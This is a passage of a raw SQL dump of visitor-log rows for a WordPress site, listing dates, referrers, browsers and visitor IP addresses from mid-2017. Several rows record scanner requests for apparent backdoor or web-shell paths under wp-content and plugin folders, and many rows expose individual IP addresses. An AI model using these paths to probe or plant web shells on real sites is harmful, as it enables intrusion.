84.154.36.171','000',4,0),(5191,'2017-05-29','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.91.82','000',1,0),(5192,'2017-05-29','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(5193,'2017-05-29','http://zphiblgz.org','Firefox','Windows','40.1','','89.236.218.105','000',2,0),(5194,'2017-05-29','http://zphiblgz.org','Firefox','Windows','50.0','','201.18.18.173','000',5,0),(5195,'2017-05-29','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',1,0),(5196,'2017-05-29','http://zphiblgz.org','Firefox','Windows','40.1','','88.226.237.123','000',2,0),(5197,'2017-05-29','http://www.google.com/','Chrome','Android','58.0.3029.83','','71.93.31.126','000',1,0),(5198,'2017-05-29','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.32.209.26','000',12,0),(5199,'2017-05-29','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','68.131.98.222','000',1,0),(5200,'2017-05-29','http://zphiblgz.org','MSIE','Unknown','8.0','','144.217.77.110','000',2,0),(5201,'2017-05-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.95.180','000',1,0),(5202,'2017-05-30','http://zphiblgz.org/','Safari','Macintosh','10.0.3','','37.187.53.94','000',2,0),(5203,'2017-05-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.89','000',2,0),(5204,'2017-05-30','http://zphiblgz.org','Firefox','Macintosh','34.0','','198.204.244.34','000',1,0),(5205,'2017-05-30','http://zphiblgz.org','Firefox','Windows','40.1','','182.185.107.192','000',2,0),(5206,'2017-05-30','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','153.194.49.134','000',1,0),(5207,'2017-05-30','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','218.221.174.127','000',1,0),(5208,'2017-05-30','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.24.131','000',2,0),(5209,'2017-05-30','http://zphiblgz.org','Firefox','Windows','40.1','','103.215.199.26','000',2,0),(5210,'2017-05-30','http://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','79.134.234.247','000',1,0),(5211,'2017-05-30','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','105.228.160.42','000',1,0),(5212,'2017-05-30','http://zphiblgz.org','Chrome','Windows','14.0.792.0','','201.86.95.6','000',1,0),(5213,'2017-05-30','http://zphiblgz.org','Chrome','Windows','11.0.669.0','','201.86.95.6','000',1,0),(5214,'2017-05-30','http://zphiblgz.org','Chrome','Linux','10.0.648.204','','201.86.95.6','000',1,0),(5215,'2017-05-30','http://zphiblgz.org','Chrome','Windows','14.0.812.0','','201.86.95.6','000',1,0),(5216,'2017-05-30','http://zphiblgz.org','Chrome','Linux','10.0.648.127','','201.86.95.6','000',2,0),(5217,'2017-05-30','http://zphiblgz.org','Chrome','Linux','12.0.742.60','','201.86.95.6','000',1,0),(5218,'2017-05-30','http://zphiblgz.org','Chrome','Windows','17.0.963.56','','201.86.95.6','000',1,0),(5219,'2017-05-30','http://zphiblgz.org','Chrome','Linux','10.0.648.133','','201.86.95.6','000',1,0),(5220,'2017-05-30','http://zphiblgz.org','Chrome','Windows','13.0.782.20','','201.86.95.6','000',1,0),(5221,'2017-05-30','http://zphiblgz.org','Chrome','Windows','12.0.702.0','','201.86.95.6','000',1,0),(5222,'2017-05-30','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','201.86.95.6','000',1,0),(5223,'2017-05-30','http://zphiblgz.org','Chrome','Windows','11.0.699.0','','201.86.95.6','000',1,0),(5224,'2017-05-30','http://zphiblgz.org','Chrome','Windows','10.0.648.134','','201.86.95.6','000',1,0),(5225,'2017-05-30','http://zphiblgz.org','Chrome','Linux','12.0.742.100','','201.86.95.6','000',1,0),(5226,'2017-05-30','http://zphiblgz.org','Chrome','Linux','13.0.782.41','','201.86.95.6','000',1,0),(5227,'2017-05-30','http://zphiblgz.org','Chrome','Linux','13.0.766.0','','201.86.95.6','000',1,0),(5228,'2017-05-30','http://zphiblgz.org','Chrome','Linux','11.0.686.3','','201.86.95.6','000',1,0),(5229,'2017-05-30','http://zphiblgz.org','Chrome','Linux','17.0.963.65','','201.86.95.6','000',1,0),(5230,'2017-05-30','http://zphiblgz.org','Chrome','Linux','19.0.1042.0','','201.86.95.6','000',1,0),(5231,'2017-05-30','http://zphiblgz.org/','Opera Next','Windows','44.0.2510.1449','','46.161.9.52','000',1,0),(5232,'2017-05-30','http://zphiblgz.org','Firefox','Windows','34.0','','198.204.244.34','000',1,0),(5233,'2017-05-30','http://zphiblgz.org','Firefox','Windows','46.0','','213.184.96.25','000',1,0),(5234,'2017-05-30','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',1,0),(5235,'2017-05-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(5236,'2017-05-30','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(5237,'2017-05-30','http://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','174.205.2.73','000',2,0),(5238,'2017-05-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.66.162','000',1,0),(5239,'2017-05-30','http://zphiblgz.org','MSIE','Windows','6.0','','198.204.244.162','000',1,0),(5240,'2017-05-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.201','000',2,0),(5241,'2017-05-30','http://email39.ru/forum/user/3316/','Opera','Windows','12.14','','194.135.83.53','000',1,0),(5242,'2017-05-30','https://www.google.com/','Chrome','Macintosh','58.0.3029.110','','173.66.196.137','000',2,0),(5243,'2017-05-30','http://zphiblgz.org','Firefox','Windows','40.1','','149.140.48.242','000',2,0),(5244,'2017-05-30','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(5245,'2017-05-30','http://zphiblgz.org','Firefox','Windows','40.1','','202.133.61.194','000',2,0),(5246,'2017-05-30','http://zphiblgz.org','MSIE','Windows','10.0','','185.57.81.38','000',1,0),(5247,'2017-05-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.11','000',1,0),(5248,'2017-05-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.233.60.147','000',1,0),(5249,'2017-05-31','http://zphiblgz.org','Firefox','Windows','40.1','','49.150.251.250','000',2,0),(5250,'2017-05-31','http://zphiblgz.org','Firefox','Android','53.0','','104.13.65.82','000',1,0),(5251,'2017-05-31','http://zphiblgz.org','redback','Unknown','v0','','109.236.8.10','000',1,0),(5252,'2017-05-31','http://zphiblgz.org','redback','Unknown','v0','','109.236.8.8','000',1,0),(5253,'2017-05-31','http://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','163.172.4.153','000',1,0),(5254,'2017-05-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.102.148.67','000',2,0),(5255,'2017-05-31','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','141.170.2.53','000',1,0),(5256,'2017-05-31','http://zphiblgz.org','Firefox','Windows','40.1','','180.178.150.8','000',2,0),(5257,'2017-05-31','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','88.198.62.158','000',1,0),(5258,'2017-05-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.201.225.45','000',1,0),(5259,'2017-05-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',1,0),(5260,'2017-05-31','http://zphiblgz.org','Firefox','Windows','40.1','','2.80.25.232','000',2,0),(5261,'2017-05-31','http://zphiblgz.org','Firefox','Windows','53.0','','178.137.92.129','000',1,0),(5262,'2017-05-31','http://zphiblgz.org/wp-content/themes/GeoPlaces3/library/includes/upload.php','Chrome','Windows','42.0.2311.152','','216.244.85.106','000',1,0),(5263,'2017-05-31','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(5264,'2017-05-31','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','155.133.82.122','000',1,0),(5265,'2017-05-31','http://zphiblgz.org','Firefox','Windows','40.1','','187.221.143.232','000',2,0),(5266,'2017-05-31','http://zphiblgz.org','Firefox','Windows','40.1','','95.7.52.184','000',2,0),(5267,'2017-05-31','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(5268,'2017-05-31','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(5269,'2017-05-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.238.169.7','000',1,0),(5270,'2017-05-31','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(5271,'2017-05-31','http://www.google.com','Firefox','Windows','3.0.14','','77.187.34.93','000',1,0),(5272,'2017-05-31','http://zphiblgz.org/membership/','Unknown','Unknown','Unknown','','88.150.210.82','000',1,0),(5273,'2017-05-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.137.189.245','000',1,0),(5274,'2017-05-31','http://www.google.com','Firefox','Windows','3.5.3','','77.187.34.93','000',1,0),(5275,'2017-05-31','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.164.7','000',1,0),(5276,'2017-05-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',1,0),(5277,'2017-05-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.39.41','000',2,0),(5278,'2017-05-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',1,0),(5279,'2017-05-31','http://zphiblgz.org/','Firefox','Windows','7.0.1','','77.109.139.87','000',1,0),(5280,'2017-05-31','http://zphiblgz.org','MSIE','Windows','11.0','','173.208.244.82','000',5,0),(5281,'2017-05-31','http://zphiblgz.org','Firefox','Windows','40.1','','122.249.158.243','000',2,0),(5282,'2017-05-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.131','000',2,0),(5283,'2017-06-01','http://zphiblgz.org','Firefox','Windows','40.1','','184.55.217.72','000',2,0),(5284,'2017-06-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','103.67.235.85','000',2,0),(5285,'2017-06-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','77.235.46.243','000',2,0),(5286,'2017-06-01','https://www.google.com/','Chrome','Android','58.0.3029.83','','73.163.22.78','000',1,0),(5287,'2017-06-01','http://www.zphibmaryland.org/chapters/','Chrome','Macintosh','58.0.3029.110','','72.83.42.230','000',2,0),(5288,'2017-06-01','http://zphiblgz.org','Firefox','Windows','40.1','','78.101.83.156','000',2,0),(5289,'2017-06-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.66','000',1,0),(5290,'2017-06-01','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(5291,'2017-06-01','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(5292,'2017-06-01','http://zphiblgz.org','Firefox','Windows','40.1','','125.162.225.246','000',2,0),(5293,'2017-06-01','http://zphiblgz.org','Firefox','Windows','40.1','','73.86.150.74','000',2,0),(5294,'2017-06-01','http://zphiblgz.org','Safari','Macintosh','10.0.3','','73.135.240.26','000',1,0),(5295,'2017-06-01','http://zphiblgz.org','Firefox','Windows','40.1','','77.77.216.53','000',2,0),(5296,'2017-06-01','http://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.75','000',1,0),(5297,'2017-06-02','http://zphiblgz.org','MSIE','Windows','10.0','','213.239.205.118','000',1,0),(5298,'2017-06-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','210.242.193.234','000',1,0),(5299,'2017-06-02','http://zphiblgz.org','Firefox','Windows','24.0','','144.76.80.151','000',5,0),(5300,'2017-06-02','http://zphiblgz.org','MSIE','Windows','9.0','','88.198.22.8','000',5,0),(5301,'2017-06-02','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','138.197.65.92','000',1,0),(5302,'2017-06-02','http://zphiblgz.org','Firefox','Windows','28.0','','138.197.111.185','000',1,0),(5303,'2017-06-02','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','138.197.111.185','000',5,0),(5304,'2017-06-02','http://zphiblgz.org','Safari','Macintosh','7.0.3','','138.197.111.185','000',1,0),(5305,'2017-06-02','http://zphiblgz.org','Chrome','Macintosh','34.0.1847.131','','138.197.111.185','000',3,0),(5306,'2017-06-02','http://zphiblgz.org','Firefox','Windows','21.0','','138.197.111.185','000',1,0),(5307,'2017-06-02','http://zphiblgz.org','Firefox','Windows','29.0','','138.197.111.185','000',2,0),(5308,'2017-06-02','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.111.185','000',1,0),(5309,'2017-06-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.15.16.4','000',2,0),(5310,'2017-06-02','http://zphiblgz.org/','Chrome','Windows','58.0.3029.81','','146.185.223.122','000',1,0),(5311,'2017-06-02','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.164.8','000',1,0),(5312,'2017-06-02','http://zphiblgz.org','Firefox','Windows','40.1','','85.154.113.216','000',2,0),(5313,'2017-06-02','http://zphiblgz.org','Chrome','Windows','58.0.3029.96','','173.69.148.18','000',2,0),(5314,'2017-06-02','http://zphiblgz.org','Firefox','Windows','40.1','','95.60.133.4','000',2,0),(5315,'2017-06-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','130.226.169.137','000',2,0),(5316,'2017-06-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',2,0),(5317,'2017-06-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','58.23.233.8','000',19,0),(5318,'2017-06-02','http://zphiblgz.org','Firefox','Windows','40.1','','178.115.130.143','000',2,0),(5319,'2017-06-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',2,0),(5320,'2017-06-02','http://zphiblgz.org','Safari','iPhone','10.0','','166.216.165.80','000',3,0),(5321,'2017-06-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.137.228.189','000',1,0),(5322,'2017-06-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.17.170.194','000',1,0),(5323,'2017-06-02','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',12,0),(5324,'2017-06-02','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(5325,'2017-06-02','http://zphiblgz.org','MSIE','Windows','11.0','','137.200.32.6','000',6,0),(5326,'2017-06-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.62','000',2,0),(5327,'2017-06-02','http://zphiblgz.org','Firefox','Windows','40.1','','197.249.65.92','000',2,0),(5328,'2017-06-02','http://zphiblgz.org','Firefox','Windows','3.6.8','','89.234.68.76','000',9,0),(5329,'2017-06-02','http://m.facebook.com','AppleWebKit','iPhone','603.2.4','','73.133.124.245','000',1,0),(5330,'2017-06-02','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','88.198.62.158','000',1,0),(5331,'2017-06-02','http://zphiblgz.org','Chrome','Windows','43.0.2384.95','','104.144.116.219','000',2,0),(5332,'2017-06-03','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.164.8','000',1,0),(5333,'2017-06-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',1,0),(5334,'2017-06-03','http://zphiblgz.org/','Firefox','Windows','52.0','','163.172.4.153','000',1,0),(5335,'2017-06-03','http://zphiblgz.org','Firefox','Windows','40.1','','60.54.68.25','000',2,0),(5336,'2017-06-03','http://zphiblgz.org/wp-content/plugins/easyrotator-for-wordpress/cache.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',2,0),(5337,'2017-06-03','http://zphiblgz.org/wp-content/themes/kuma/versins.php','Chrome','Windows','5.0.375.99','','78.46.37.187','000',1,0),(5338,'2017-06-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(5339,'2017-06-03','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(5340,'2017-06-03','http://zphiblgz.org/','MSIE','Windows','11.0','','62.210.79.79','000',1,0),(5341,'2017-06-03','http://zphiblgz.org/','Opera','Windows','12.17','','104.144.18.119','000',2,0),(5342,'2017-06-03','http://zphiblgz.org','Firefox','Windows','40.1','','213.94.229.28','000',2,0),(5343,'2017-06-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.84.108','000',1,0),(5344,'2017-06-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.202.98.160','000',2,0),(5345,'2017-06-03','http://zphiblgz.org','Firefox','Windows','40.1','','82.1.149.205','000',2,0),(5346,'2017-06-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.128.43.164','000',1,0),(5347,'2017-06-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(5348,'2017-06-03','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',3,0),(5349,'2017-06-03','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','73.212.87.18','000',1,0),(5350,'2017-06-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.127.145','000',1,0),(5351,'2017-06-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.134','000',2,0),(5352,'2017-06-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','146.185.177.103','000',1,0),(5353,'2017-06-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(5354,'2017-06-03','http://zphiblgz.org/scholarship/','Chrome','Windows','57.0.2987.133','','146.185.223.87','000',2,0),(5355,'2017-06-03','http://zphiblgz.org/wp-content/themes/coraline/inc/gswych.php','Chrome','Windows','5.0.375.99','','193.151.90.22','000',1,0),(5356,'2017-06-03','http://zphiblgz.org/wp-content/etc.php','Chrome','Windows','5.0.375.99','','198.71.226.56','000',1,0),(5357,'2017-06-03','https://www.google.com/','Safari','iPhone','10.0','','76.111.97.94','000',2,0),(5358,'2017-06-03','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','89.106.102.128','000',1,0),(5359,'2017-06-03','http://zphiblgz.org','Firefox','Windows','40.1','','187.37.227.2','000',2,0),(5360,'2017-06-03','http://zphiblgz.org','MSIE','Windows','9.0','','160.202.162.45','000',16,0),(5361,'2017-06-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','141.170.2.53','000',1,0),(5362,'2017-06-04','http://zphiblgz.org','Chrome','Linux','12.0.742.100','','176.31.126.56','000',2,0),(5363,'2017-06-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(5364,'2017-06-04','http://zphiblgz.org/wp-content/uploads/etc.php','Chrome','Windows','5.0.375.99','','193.151.90.22','000',1,0),(5365,'2017-06-04','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.164.14','000',1,0),(5366,'2017-06-04','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.4','000',1,0),(5367,'2017-06-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.223.82.156','000',1,0),(5368,'2017-06-04','http://zphiblgz.org','Firefox','Windows','21.0','','138.197.104.18','000',1,0),(5369,'2017-06-04','http://zphiblgz.org','Firefox','Windows','28.0','','138.197.104.18','000',3,0),(5370,'2017-06-04','http://zphiblgz.org','Firefox','Windows','29.0','','138.197.104.18','000',1,0),(5371,'2017-06-04','http://zphiblgz.org','MSIE','Windows','9.0','','138.197.104.18','000',3,0),(5372,'2017-06-04','http://zphiblgz.org','Firefox','Macintosh','29.0','','138.197.104.18','000',2,0),(5373,'2017-06-04','http://zphiblgz.org','Chrome','Macintosh','34.0.1847.131','','138.197.104.18','000',1,0),(5374,'2017-06-04','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','138.197.104.18','000',2,0),(5375,'2017-06-04','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','194.44.247.218','000',1,0),(5376,'2017-06-04','http://zphiblgz.org/wp-content/plugins/wp_module/wp_msg.php','Chrome','Windows','5.0.375.99','','178.254.0.210','000',1,0),(5377,'2017-06-04','http://zphiblgz.org','Firefox','Windows','40.1','','203.87.129.143','000',2,0),(5378,'2017-06-04','http://zphiblgz.org/wp-content/themes/twentytwelve/system.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',1,0),(5379,'2017-06-04','http://zphiblgz.org','Firefox','Windows','40.1','','94.69.152.254','000',2,0),(5380,'2017-06-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(5381,'2017-06-04','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',3,0),(5382,'2017-06-04','http://zphiblgz.org','curl','Unknown','7.54.0','','92.53.28.235','000',1,0),(5383,'2017-06-04','http://zphiblgz.org/wp-content/plugins/revslider/temp/update_extract/conf.php','Chrome','Windows','42.0.2311.152','','216.244.86.114','000',1,0),(5384,'2017-06-04','http://zphiblgz.org','Chrome','Windows','40.0.2214.115','','45.32.130.173','000',1,0),(5385,'2017-06-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.76.240','000',1,0),(5386,'2017-06-04','http://zphiblgz.org','Firefox','Windows','40.1','','41.114.106.193','000',2,0),(5387,'2017-06-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.204','000',1,0),(5388,'2017-06-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.10.104.243','000',1,0),(5389,'2017-06-04','http://zphiblgz.org','Firefox','Linux','21.0','','37.187.56.81','000',112,0),(5390,'2017-06-04','http://zphiblgz.org','Firefox','Windows','3.6.3','','54.81.14.132','000',1,0),(5391,'2017-06-04','http://zphiblgz.org/wp-content/plugins/wp-db-backup-made/system.php','Chrome','Windows','5.0.375.99','','88.210.46.77','000',1,0),(5392,'2017-06-04','http://zphiblgz.org','Safari','iPad','10.0','','73.173.91.7','000',4,0),(5393,'2017-06-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','170.130.98.22','000',1,0),(5394,'2017-06-05','http://zphiblgz.org','Firefox','Windows','40.1','','181.92.156.160','000',2,0),(5395,'2017-06-05','http://zphiblgz.org','Firefox','Windows','40.1','','177.94.13.9','000',2,0),(5396,'2017-06-05','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',4,0),(5397,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.187.7.74','000',1,0),(5398,'2017-06-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','173.254.216.66','000',1,0),(5399,'2017-06-05','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(5400,'2017-06-05','http://zphiblgz.org/','MSIE','Windows','11.0','','173.245.202.61','000',1,0),(5401,'2017-06-05','http://zphiblgz.org','Chrome','Windows','39.0.2171.99','','198.204.244.34','000',1,0),(5402,'2017-06-05','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(5403,'2017-06-05','http://zphiblgz.org','Firefox','Windows','40.1','','115.160.252.254','000',2,0),(5404,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',1,0),(5405,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.135.158.101','000',1,0),(5406,'2017-06-05','http://zphiblgz.org','Firefox','Windows','40.1','','39.57.48.98','000',2,0),(5407,'2017-06-05','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','74.91.43.42','000',2,0),(5408,'2017-06-05','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','172.82.143.169','000',2,0),(5409,'2017-06-05','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','173.234.44.119','000',2,0),(5410,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.201','000',1,0),(5411,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.8','000',1,0),(5412,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.4','000',1,0),(5413,'2017-06-05','https://www.google.com/','Chrome','Windows','58.0.3029.110','','65.209.60.116','000',4,0),(5414,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.51.91','000',2,0),(5415,'2017-06-05','http://zphiblgz.org','Firefox','Windows','1.0.7','','34.204.12.166','000',1,0),(5416,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.240','000',1,0),(5417,'2017-06-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(5418,'2017-06-05','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(5419,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.83','000',1,0),(5420,'2017-06-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','170.75.159.234','000',2,0),(5421,'2017-06-05','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','63.223.126.127','000',2,0),(5422,'2017-06-05','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','69.162.143.212','000',2,0),(5423,'2017-06-05','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','171.25.193.131','000',1,0),(5424,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','52.15.228.241','000',1,0),(5425,'2017-06-05','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made1/wp-ajax.php','Chrome','Windows','5.0.375.99','','5.61.249.104','000',1,0),(5426,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.248.2.85','000',1,0),(5427,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.95.180','000',2,0),(5428,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.9','000',2,0),(5429,'2017-06-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.210.37.82','000',1,0),(5430,'2017-06-05','http://zphiblgz.org/wp-content/plugins/xcloner-backup-and-restore/configs/test.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',8,0),(5431,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.1.129','000',1,0),(5432,'2017-06-05','http://zphiblgz.org','Firefox','Windows','40.1','','86.3.181.151','000',2,0),(5433,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.42.4','000',1,0),(5434,'2017-06-05','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','73.201.199.79','000',5,0),(5435,'2017-06-05','http://zphiblgz.org/','Firefox','Windows','x.x','','155.133.64.195','000',1,0),(5436,'2017-06-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.7','000',1,0),(5437,'2017-06-05','http://zphiblgz.org','Firefox','Windows','40.1','','184.148.137.119','000',2,0),(5438,'2017-06-05','https://www.google.com/','Chrome','Windows','58.0.3029.110','','50.89.216.10','000',1,0),(5439,'2017-06-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','130.226.169.137','000',1,0),(5440,'2017-06-05','http://zphiblgz.org/wp-content/themes/kuma/figure.php','Chrome','Windows','5.0.375.99','','64.119.182.208','000',1,0),(5441,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',1,0),(5442,'2017-06-06','http://zphiblgz.org','CATExplorador','Unknown','1.0beta','','45.32.151.39','000',2,0),(5443,'2017-06-06','http://zphiblgz.org','Firefox','Windows','50.0','','201.18.18.173','000',5,0),(5444,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.126.252.12','000',1,0),(5445,'2017-06-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','34.204.12.166','000',1,0),(5446,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',1,0),(5447,'2017-06-06','http://zphiblgz.org','Firefox','Windows','40.1','','94.189.157.104','000',2,0),(5448,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(5449,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.42','000',1,0),(5450,'2017-06-06','http://zphiblgz.org/wp-content/plugins/js_composer/vendor/composer/config.php','Chrome','Windows','5.0.375.99','','91.206.201.94','000',1,0),(5451,'2017-06-06','http://zphiblgz.org/wp-includes/logo_img.php','Chrome','Windows','5.0.375.99','','62.75.158.92','000',1,0),(5452,'2017-06-06','http://www.google.com/','Chrome','Android','58.0.3029.83','','172.58.184.190','000',5,0),(5453,'2017-06-06','http://zphiblgz.org/wp-content/themes/clubblog/db.php','Chrome','Windows','5.0.375.99','','130.255.170.20','000',1,0),(5454,'2017-06-06','http://zphiblgz.org','Firefox','Windows','1.0.7','','54.145.251.90','000',1,0),(5455,'2017-06-06','https://www.google.co.in/','Safari','Macintosh','10.1','','14.141.198.130','000',1,0),(5456,'2017-06-06','http://zphiblgz.org','Firefox','Windows','40.1','','202.129.210.57','000',2,0),(5457,'2017-06-06','http://zphiblgz.org/wp-admin/security.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',2,0),(5458,'2017-06-06','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwixgZWJv6nUAhUW1GMKHWCRCcUQFggoMAE&url=http%3A%2F%2Fzphiblgz.org%2Fyouth%2F&usg=AFQjCNGTcqMlTP2VI7fX_Vx6uHn0swvhag','MSIE','Windows','11.0','','171.161.160.10','000',1,0),(5459,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.139.248','000',2,0),(5460,'2017-06-